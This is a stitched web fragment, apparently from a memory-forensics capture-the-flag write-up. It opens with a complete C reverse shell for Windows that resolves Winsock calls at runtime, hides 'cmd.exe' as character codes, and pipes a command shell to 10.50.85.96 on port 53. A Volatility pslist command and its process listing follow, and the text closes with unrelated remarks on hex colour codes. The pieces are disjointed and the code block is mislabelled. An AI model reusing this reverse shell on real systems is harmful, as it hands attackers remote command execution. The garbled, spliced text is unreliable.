~~~~~~~~~~~~~~~ FIRST SHAPE ~~~~~~~~~~~~~~~~~~
</p><code style="position:relative;display:block;" language="solidity" meta="" data-v-564f77c2=""><button class="copy-icon" data-v-564f77c2=""><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" data-v-564f77c2=""><path d="M16 12.9V17.1C16 20.6 14.6 22 11.1 22H6.9C3.4 22 2 20.6 2 17.1V12.9C2 9.4 3.4 8 6.9 8H11.1C14.6 8 16 9.4 16 12.9Z"></path><path d="M17.0998 2H12.8998C9.81668 2 8.37074 3.09409 8.06951 5.73901C8.00649 6.29235 8.46476 6.75 9.02167 6.75H11.0998C15.2998 6.75 17.2498 8.7 17.2498 12.9V14.9781C17.2498 15.535 17.7074 15.9933 18.2608 15.9303C20.9057 15.629 21.9998 14.1831 21.9998 11.1V6.9C21.9998 3.4 20.5998 2 17.0998 2Z"></path></svg></button><!--[--><div class="github-dark">
<pre><code>
<span class="ct-857441">#include</span> <span class="ct-533739">&lt;winsock2.h&gt;</span>
<span class="ct-857441">#include</span> <span class="ct-533739">&lt;windows.h&gt;</span>
<span class="ct-857441">#include</span> <span class="ct-533739">&lt;ws2tcpip.h&gt;</span>
<span class="ct-857441">#include</span> <span class="ct-533739">&lt;stdio.h&gt;</span>
<span class="ct-857441">#include</span> <span class="ct-533739">&lt;stdlib.h&gt;</span>

<span class="ct-857441">#define</span> MAX_BUF <span class="ct-806137">1024</span>

<span class="ct-857441">typedef</span> <span class="ct-211346">int</span>(WSAAPI *FUNC_WSASTARTUP)(WORD, LPWSADATA);
<span class="ct-857441">typedef</span> SOCKET(WSAAPI *FUNC_WSASOCKETA)(<span class="ct-211346">int</span>, <span class="ct-211346">int</span>, <span class="ct-211346">int</span>, LPWSAPROTOCOL_INFOA, GROUP, DWORD);
<span class="ct-857441">typedef</span> <span class="ct-211346">unsigned long</span>(WSAAPI *FUNC_INET_ADDR)(<span class="ct-211346">const char</span> *);
<span class="ct-857441">typedef</span> u_short(WSAAPI *FUNC_HTONS)(u_short);
<span class="ct-857441">typedef</span> <span class="ct-211346">int</span>(WSAAPI *FUNC_WSACONNECT)(SOCKET, <span class="ct-211346">const struct</span> sockaddr *, <span class="ct-211346">int</span>, LPWSABUF, LPWSABUF, LPQOS, LPQOS);
<span class="ct-857441">typedef</span> <span class="ct-211346">int</span>(WSAAPI *FUNC_CLOSESOCKET)(SOCKET);
<span class="ct-857441">typedef</span> <span class="ct-211346">int</span>(WSAAPI *FUNC_WSACLEANUP)(<span class="ct-211346">void</span>);

<span class="ct-857441">void</span> ExecCmd(<span class="ct-211346">char</span>* server, <span class="ct-211346">int</span> port) {
    SOCKET sock;
    <span class="ct-211346">struct</span> sockaddr_in addr;
    WSADATA wsaData;

    HMODULE lib = LoadLibraryW(L<span class="ct-533739">"ws2_32"</span>);

    FUNC_WSASTARTUP startup = (FUNC_WSASTARTUP)GetProcAddress(lib, <span class="ct-533739">"WSAStartup"</span>);
    FUNC_WSASOCKETA socketA = (FUNC_WSASOCKETA)GetProcAddress(lib, <span class="ct-533739">"WSASocketA"</span>);
    FUNC_INET_ADDR inet = (FUNC_INET_ADDR)GetProcAddress(lib, <span class="ct-533739">"inet_addr"</span>);
    FUNC_HTONS htons = (FUNC_HTONS)GetProcAddress(lib, <span class="ct-533739">"htons"</span>);
    FUNC_WSACONNECT connect = (FUNC_WSACONNECT)GetProcAddress(lib, <span class="ct-533739">"WSAConnect"</span>);
    FUNC_CLOSESOCKET closeSock = (FUNC_CLOSESOCKET)GetProcAddress(lib, <span class="ct-533739">"closesocket"</span>);
    FUNC_WSACLEANUP cleanup = (FUNC_WSACLEANUP)GetProcAddress(lib, <span class="ct-533739">"WSACleanup"</span>);

    startup(MAKEWORD(<span class="ct-806137">2,2</span>), &wsaData);
    sock = socketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, <span class="ct-806137">0</span>    , <span class="ct-806137">0</span>);
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet(server);
    addr.sin_port = htons((u_short)port);

    <span class="ct-857441">if</span> (connect(sock, (SOCKADDR*)&addr, <span class="ct-806137">sizeof</span>(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        closeSock(sock);
        cleanup();
    } <span class="ct-857441">else</span> {
        <span class="ct-211346">char</span> cmd[] = {<span class="ct-806137">99, 109, 100, 46, 101, 120, 101, 0</span>}; <span class="ct-244866">// "cmd.exe"</span>
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        memset(&si, <span class="ct-806137">0</span>, <span class="ct-806137">sizeof</span>(si));
        si.cb = <span class="ct-806137">sizeof</span>(si);
        si.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
        si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE) sock;
        CreateProcess(NULL, cmd, NULL, NULL, TRUE, <span class="ct-806137">0</span>, NULL, NULL, &si, &pi);
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

<span class="ct-857441">int</span> main(<span class="ct-211346">int</span> argc, <span class="ct-211346">char</span> **argv) {
    <span class="ct-211346">char</span> server[] = <span class="ct-533739">"10.50.85.96"</span>;
    <span class="ct-211346">int</span> port = <span class="ct-806137">53</span>;
    <span class="ct-857441">if</span> (argc == <span class="ct-806137">3</span>) {
        port = atoi(argv[<span class="ct-806137">2</span>]);
        ExecCmd(argv[<span class="ct-806137">1</span>], port);
    } <span class="ct-857441">else</span> {
        ExecCmd(server, port);
    }
    <span class="ct-857441">return</span> <span class="ct-806137">0</span>;
}
</code></pre>
</div>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Using command ] ~~~~~~~~~~~~~~~~~~~~~~~~~~
<p>Using <code data-v-85b4a466="" class="highlighted-code">vol.py -f challenge.vmem --profile=Win10x64_18362 pslist</code> we can get a list of running processes:</p>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ .TXT file content ] ~~~~~~~~~~~~~~~
<code data-v-564f77c2="" style="position: relative; display: block;" highlights=""><button data-v-564f77c2="" class="copy-icon"><svg data-v-564f77c2="" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M16 12.9V17.1C16 20.6 14.6 22 11.1 22H6.9C3.4 22 2 20.6 2 17.1V12.9C2 9.4 3.4 8 6.9 8H11.1C14.6 8 16 9.4 16 12.9Z"></path><path d="M17.0998 2H12.8998C9.81668 2 8.37074 3.09409 8.06951 5.73901C8.00649 6.29235 8.46476 6.75 9.02167 6.75H11.0998C15.2998 6.75 17.2498 8.7 17.2498 12.9V14.9781C17.2498 15.535 17.7074 15.9933 18.2608 15.9303C20.9057 15.629 21.9998 14.1831 21.9998 11.1V6.9C21.9998 3.4 20.5998 2 17.0998 2Z"></path></svg></button><pre class=""><code>Volatility Foundation Volatility Framework 2.6.1
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe00d93088040 System                    4      0    198        0 ------      0 2021-01-18 13:50:29 UTC+0000                                 
0xffffe00d930d6080 Registry                136      4      4        0 ------      0 2021-01-18 13:50:25 UTC+0000                                 
0xffffe00d976dd040 smss.exe                408      4      4        0 ------      0 2021-01-18 13:50:29 UTC+0000                                 
0xffffe00d97d1d140 csrss.exe               528    520     12        0      0      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98610080 wininit.exe             608    520      5 --------      0      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d97d43080 csrss.exe               616    600     13        0      1      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98687200 services.exe            692    608     10        0      0      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d986c0080 winlogon.exe            724    600      5        0      1      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98522080 lsass.exe               780    608     12        0      0      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98e633c0 svchost.exe             904    692     28        0      0      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98e842c0 fontdrvhost.ex          932    608      6        0      0      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98e822c0 fontdrvhost.ex          940    724      6        0      1      0 2021-01-18 13:50:30 UTC+0000                                 
0xffffe00d98ecb440 svchost.exe            1020    692     18        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98f810c0 dwm.exe                 604    724     24        0      1      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98fc63c0 svchost.exe            1048    692     80        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98fe8440 svchost.exe            1088    692     36        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98fea480 svchost.exe            1096    692     21        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98fec480 svchost.exe            1104    692      6        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98fe9080 svchost.exe            1116    692     19        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d98745400 svchost.exe            1192    692     13        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d987f9400 svchost.exe            1456    692      4        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d99067440 svchost.exe            1564    692      7        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d987f8080 svchost.exe            1644    692     34        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d9906a040 MemCompression         1668      4     47 -------- ------      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d992a3480 svchost.exe            1944    692     13        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d93085080 svchost.exe            2036    692      5        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d99332480 svchost.exe            2044    692     15        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d930cc080 svchost.exe            1748    692     11        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d97a50080 spoolsv.exe            2128    692     15        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d993d1480 svchost.exe            2200    692     23        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d994e23c0 svchost.exe            2440    692     10        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d994e7440 vmtoolsd.exe           2448    692     12        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d994e9480 VGAuthService.         2456    692      3        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d995044c0 MsMpEng.exe            2520    692     45        0      0      0 2021-01-18 13:50:31 UTC+0000                                 
0xffffe00d9959e3c0 svchost.exe            2640    692     16        0      0      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d996d9400 dllhost.exe            2900    692     27        0      0      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d9978d400 dllhost.exe            2256    692     17        0      0      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d998083c0 svchost.exe            1600    692      6        0      0      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d99884400 WmiPrvSE.exe           2528    904     15        0      0      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d998ed440 msdtc.exe              3132    692     13        0      0      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d99999080 sihost.exe             3308   1048     15        0      1      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d999dd080 svchost.exe            3344    692     15        0      1      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d99a7e480 taskhostw.exe          3492   1048     11        0      1      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d99bf20c0 ctfmon.exe             3764   1192     12        0      1      0 2021-01-18 13:50:32 UTC+0000                                 
0xffffe00d99be04c0 userinit.exe           3844    724      0 --------      1      0 2021-01-18 13:50:32 UTC+0000   2021-01-18 13:50:56 UTC+0000  
0xffffe00d99ceb4c0 explorer.exe           3904   3844     66        0      1      0 2021-01-18 13:50:33 UTC+0000                                 
0xffffe00d99f2d440 svchost.exe             504    692      8        0      1      0 2021-01-18 13:50:33 UTC+0000                                 
0xffffe00d99faf080 dllhost.exe            4220    904      6        0      1      0 2021-01-18 13:50:33 UTC+0000                                 
0xffffe00d9a015080 StartMenuExper         4436    904     59        0      1      0 2021-01-18 13:50:33 UTC+0000                                 
0xffffe00d9a07f3c0 VSSVC.exe              4620    692      5        0      0      0 2021-01-18 13:50:33 UTC+0000                                 
0xffffe00d9a10f440 RuntimeBroker.         4692    904      8        0      1      0 2021-01-18 13:50:33 UTC+0000                                 
0xffffe00d9a1de400 SearchIndexer.         4808    692     56        0      0      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a1e1080 SearchUI.exe           4848    904     40        0      1      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a251440 RuntimeBroker.         5108    904     15        0      1      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a316240 backgroundTask         5136    904     14        0      1      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a5a9240 ApplicationFra         5156    904     19        0      1      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a5ba0c0 MicrosoftEdge.         5196    904     47        0      1      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a6f84c0 NisSrv.exe             5356    692     11        0      0      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a34c480 browser_broker         5576    904     12        0      1      0 2021-01-18 13:50:34 UTC+0000                                 
0xffffe00d9a815440 RuntimeBroker.         5788    904      5        0      1      0 2021-01-18 13:50:35 UTC+0000                                 
0xffffe00d9a818440 RuntimeBroker.         5852    904     15        0      1      0 2021-01-18 13:50:35 UTC+0000                                 
0xffffe00d9a81b080 MicrosoftEdgeC         5864    904     74        0      1      0 2021-01-18 13:50:35 UTC+0000                                 
0xffffe00d9a89f080 MicrosoftEdgeS         5968   5852     12        0      1      0 2021-01-18 13:50:35 UTC+0000                                 
0xffffe00d99f74440 smartscreen.ex         6504    904     19        0      1      0 2021-01-18 13:50:45 UTC+0000                                 
0xffffe00d9a7a34c0 SecurityHealth         6560   3904      4        0      1      0 2021-01-18 13:50:45 UTC+0000                                 
0xffffe00d9a9c1080 SecurityHealth         6596    692     13        0      0      0 2021-01-18 13:50:45 UTC+0000                                 
0xffffe00d9a4b64c0 vm3dservice.ex         6676   3904      1        0      1      0 2021-01-18 13:50:46 UTC+0000                                 
0xffffe00d9a4b5080 vmtoolsd.exe           6696   3904      9        0      1      0 2021-01-18 13:50:46 UTC+0000                                 
0xffffe00d9a4b7080 OneDrive.exe           6752   3904     24        0      1      1 2021-01-18 13:50:47 UTC+0000                                 
0xffffe00d934064c0 dllhost.exe            7000    904     14        0      1      0 2021-01-18 13:50:50 UTC+0000                                 
0xffffe00d9af06400 WmiPrvSE.exe           2488    904     16        0      0      0 2021-01-18 13:50:52 UTC+0000                                 
0xffffe00d9af0f480 svchost.exe            4044    692     13        0      0      0 2021-01-18 13:50:52 UTC+0000                                 
0xffffe00d9af57080 mstsc.exe              6484   3904     27        0      1      0 2021-01-18 13:50:54 UTC+0000                                 
0xffffe00d9afd2080 svchost.exe            6832    692      9        0      0      0 2021-01-18 13:50:56 UTC+0000                                 
0xffffe00d9b0693c0 WmiApSrv.exe           6928    692      8        0      0      0 2021-01-18 13:50:57 UTC+0000                                 
0xffffe00d9ae87080 audiodg.exe            7792   1944      8        0      0      0 2021-01-18 13:51:04 UTC+0000                                 
0xffffe00d9a24a4c0 MicrosoftEdgeC         8104    904     19        0      1      0 2021-01-18 13:51:11 UTC+0000                                 
0xffffe00d9b6454c0 MicrosoftEdgeC         7636    904     43        0      1      0 2021-01-18 13:51:21 UTC+0000                                 
0xffffe00d9b1c14c0 MicrosoftEdgeC         7532    904     20        0      1      0 2021-01-18 13:51:21 UTC+0000                                 
0xffffe00d9340f080 cmd.exe                7420   2448      0 --------      0      0 2021-01-18 13:51:49 UTC+0000   2021-01-18 13:51:49 UTC+0000  
0xffffe00d930d0080 conhost.exe            8024   7420      0        0      0      0 2021-01-18 13:51:49 UTC+0000 

</code></pre></code>

~~~~~~~~~~~~~~ [my colors ] ~~~~~~~~~~~~
The color #1b6706 is a shade of green.
"Indian Red," in hex, is typically #CD5C5C.
i like this red: #dc3545;